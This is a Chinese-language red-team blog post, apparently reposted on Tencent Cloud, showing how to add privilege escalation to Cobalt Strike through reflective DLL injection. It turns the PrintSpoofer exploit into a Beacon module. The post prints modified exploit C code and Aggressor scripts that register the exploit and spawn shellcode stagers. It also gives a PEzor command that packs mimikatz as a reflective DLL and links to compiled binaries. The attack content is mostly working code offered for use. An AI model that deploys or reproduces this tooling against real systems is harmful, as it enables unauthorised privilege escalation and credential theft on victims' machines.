学习
实践
活动
专区
工具
TVP
写文章
专栏首页鸿鹄实验室使用ReflectiveDLLInjection武装你的CobaltStrike

使用ReflectiveDLLInjection武装你的CobaltStrike

众所周知,CobaltStrike是一款优秀的C2工具,但其没有为我们提供想metasploit那样丰富的提权功能,好在其AggressorScript为我们提供了无限的可能,也衍生除了很多优秀的cna脚本,比如taowu等等。里面就包含了提权功能,下面是部分脚本中提权功能的实现:

可以看到方式各不相同,部分需要exe落地,而有的则使用了今天我们需要讲的ReflectiveDLLInjection,通常,在进程启动时,DLL被加载到内存中;但是,DLL也可以注入到正在运行的进程中。通过DLL注入,我们不再需要创建进程来执行代码(各种DLL注入技术);但是,我们仍然需要将文件写入磁盘才能完成注入。反射型DLL注入解决了这个问题。该技术由StephenFewer开发,允许我们将代码注入现有进程而无需写入磁盘。因此,利用型反射DLL注入,我们可以跳过写入磁盘以及创建进程,直接将代码完整注入内存,AggressorScript脚本提供了一些关于反射DLL的接口:https://cobaltstrike.com/aggressor-script/functions.html#bdllspawn

那么我们下面就来写一个简单的ReflectiveDLLInjection,在之前已经有了比较成熟的项目,我们直接拿过来用即可:https://github.com/stephenfewer/ReflectiveDLLInjection

效果为启动弹出helloworld。

然后就是写cna了,简单的写一下就行:

alias reflective_dll {
  btask($1, "reflective_dll test");
  bdllspawn!($1, script_resource("reflective_dll.x64.dll"), $null, "MessageBox" , 1000);
}

然后CobaltStrike运行reflective_dll就行啦。那么上面说到了提权,我们就来看一下如何将提权exp进行反射处理,这里以PrintSpoofer(https://github.com/itm4n/PrintSpoofer)为例:

首先导入相关的头文件:ReflectiveDllInjection.h、ReflectiveLoader.cpp、ReflectiveLoader.h。

接下来,就是删除原文件中的main了。

然后需要更改的就是GetSystem函数,原来的exp,该函数是用来进行后续的CreateProcessAsUser操作的,我们这里用不到,把它改成下面这样就行了:

BOOL GetSystem(HANDLE hPipe)
{
  if (!ImpersonateNamedPipeClient(hPipe))
  {
    wprintf(L"ImpersonateNamedPipeClient(). Error: %d\n", GetLastError());
    return FALSE;
  }
  wprintf(L"[+] ImpersoneteNamedPipeClient OK\n");
  return TRUE;

}

然后将之前在main中需要实现的过程,在dll中进行实现:

基本上就差不多了,接下来就是编译成x86、x64版本的就行啦。

然后来编写我们的cna文件:

注册提权使用的是beacon_exploit_register

sub ms16_016_exploit {
  local('$stager');
  
  # check if we're on an x64 system and error out.
  if (-is64 $1) {
    berror($1, "ms16-016 exploit is x86 only");
    return;
  }

  # acknowledge this command
  btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016", "T1068");

  # generate our shellcode
  $stager = payload($2, "x86");

  # spawn a Beacon post-ex job with the exploit DLL
  bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

  # link to our payload if it's a TCP or SMB Beacon
  beacon_link($1, $null, $2);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

仿照该代码,编写我们的:

sub printspoofer {
    btask($1, "Task Beacon to run " . listener_describe($2) . "  PrintSpoofer");
    
    if (-is64 $1)
    {
        $arch = "x64";
        $dll = script_resource("x64.dll");
    } else {
        $arch = "x86";
        $dll = script_resource("x86.dll");
    }
    $stager = shellcode($2, false, $arch);
    
    bdllspawn!($1, $dll, $stager, "PrintSpoofer local elevate privilege", 5000);
    
    bstage($1, $null, $2, $arch);
}

beacon_exploit_register("PrintSpoofer", "PrintSpoofer local elecate privilege", &printspoofer);

好了,进行测试。。

除了自己写之外呢,最近新出的pezor也可以实现相同的效果:

PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'

文章中的所涉及的编译好的文件已上传至GitHub,需要的自取:https://github.com/lengjibo/RedTeamTools/tree/master/windows/PrintSpoofer_ReflectiveDLL

参考文章:

https://payloads.online/archivers/2020-03-02/1

https://bbs.pediy.com/thread-246930.htm

https://cobaltstrike.com/aggressor-script/functions.html

文章分享自微信公众号:
鸿鹄实验室

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:鸿鹄实验室a
原始发表时间:2020-12-02
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • RogueWinRM提权

    RogueWinRM是一种新型的提权方法,原理在https://decoder.cloud/2019/12/06/we-thought-they-were-po...

    鸿鹄实验室
  • 使用Lint工具“武装”你的项目

    通过静态检查工具来规范自己项目的代码,让团队所有成员保持一致的编码风格,这样大家可以专注于核心特性的开发,提升整体开发效率。

    Kagol
  • CobaltStrike专题 | CobaltStrike 代理的使用

    声明:公众号文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载!请勿利用文章内的相关技术从事非法测试,如因此...

    betasec
  • 用python武装你的后院

    在知乎上看到一个问题:“可以用 Python 做哪些神奇好玩的事情?”。被赞同最多的一个回答提到了一个叫做Kurt Grandis的程序员,他用Python做了...

    Crossin先生
  • 如何武装你的Vue项目?

    我想混迹前端市场的大家都知道,Vue可以说是一匹黑马,目前github star数已居第一位!前端开发者对Vue使用频率也越来越高。

    前端劝退师
  • 工具的使用 | CobaltStrike的使用

    CobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式...

    谢公子
  • 如何武装你的BurpSuite(一)

    由于上次发了一篇文章,记一次Apache Shiro权限绕过实战,文章中出现了利用BurpSutie扩展,快速定位Shiro框架资产的插件,很多同学找我问了这是...

    F12sec
  • 武装你的小程序——开发流程指南

    全文全部基于原生的小程序开发所阐述,各种第三方框架开发不在此列。并不会将整个项目的搭建流程细致的写出来,而是挑其中我认为在开发过程中存在的一些很重要的点进行详细...

    李文杨
  • 武装你的小程序——开发流程指南

    全文全部基于原生的小程序开发所阐述,各种第三方框架开发不在此列。并不会将整个项目的搭建流程细致的写出来,而是挑其中我认为在开发过程中存在的一些很重要的点进行详细...

    李文杨
  • 工具的使用 | CobaltStrike中DNS Beacon的使用

    在之前的文章中我介绍了使用 DNS-Shell 和 Dnscat2 利用DNS协议来进行命令控制,通过DNS协议进行通信,使得流量更加隐秘,躲避agent/DL...

    谢公子
  • 如何使用BeaconEye监控CobaltStrike的Beacon

    BeaconEye是一款针对CobaltStrike的安全工具,该工具可以扫描正在运行的主动CobaltStrike Beacon。当BeaconEye扫描到了...

    FB客服
  • 工具的使用 | CobaltStrike证书修改躲避流量审查

    在红蓝对抗中,防守方往往会有很多的设备审计流量。Cobalt Strike 服务端和客户端是通过 SSL 加密通讯的,默认情况下的SSL配置文件和代理配置文件导...

    Gcow安全团队
  • 工具的使用 | CobaltStrike证书修改躲避流量审查

    在红蓝对抗中,防守方往往会有很多的设备审计流量。Cobalt Strike 服务端和客户端是通过 SSL 加密通讯的,默认情况下的SSL配置文件和代理配置文件导...

    谢公子
  • 工具的使用 | CobaltStrike上线Linux主机(CrossC2)

    在红蓝对抗中,我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机,我们可以使用CobaltStrike,那么自然我们会想问,Cobal...

    谢公子
  • 花十分钟的时间武装你的代码库

    当我们的代码库有很多人维护时,经常会出现代码风格不一致或者代码质量不过关,提交信息杂乱的情况,当然啦,即使是一个人的代码库,有的时候,自己写代码时不太注意细节,...

    刘小夕
  • 推荐常用的六个插件武装你的Chrome(附带文件下载)

    没有“科学上网”工具的同学,在你想找一个 Chrome 浏览器插件的时候,痛不欲生?。百度一搜,全都是一些花里胡哨的下载站点,点开还要你关注什么乱七八糟的公众号...

    奈何缘浅wyj
  • 精选10款谷歌浏览器插件武装你的浏览器

    最近看到的一段话很有感触,日复一日的低效率工作只会消磨你的热情,而巨大的时间成本会让你错失很多机会。

    用户3806669
  • 精选10款谷歌浏览器插件武装你的浏览器

    最近看到的一段话很有感触,日复一日的低效率工作只会消磨你的热情,而巨大的时间成本会让你错失很多机会。

    王小婷
  • 抛砖引玉之CobaltStrike4.1的BOF

    文章初衷只为攻防研究、技术交流只用。严禁利用相关技术去从事一切未经合法授权的入侵攻击破坏活动。因此产生的一切不良后果与文章作者及本公众号无关。

    鸿鹄实验室

扫码关注腾讯云开发者

领取腾讯云代金券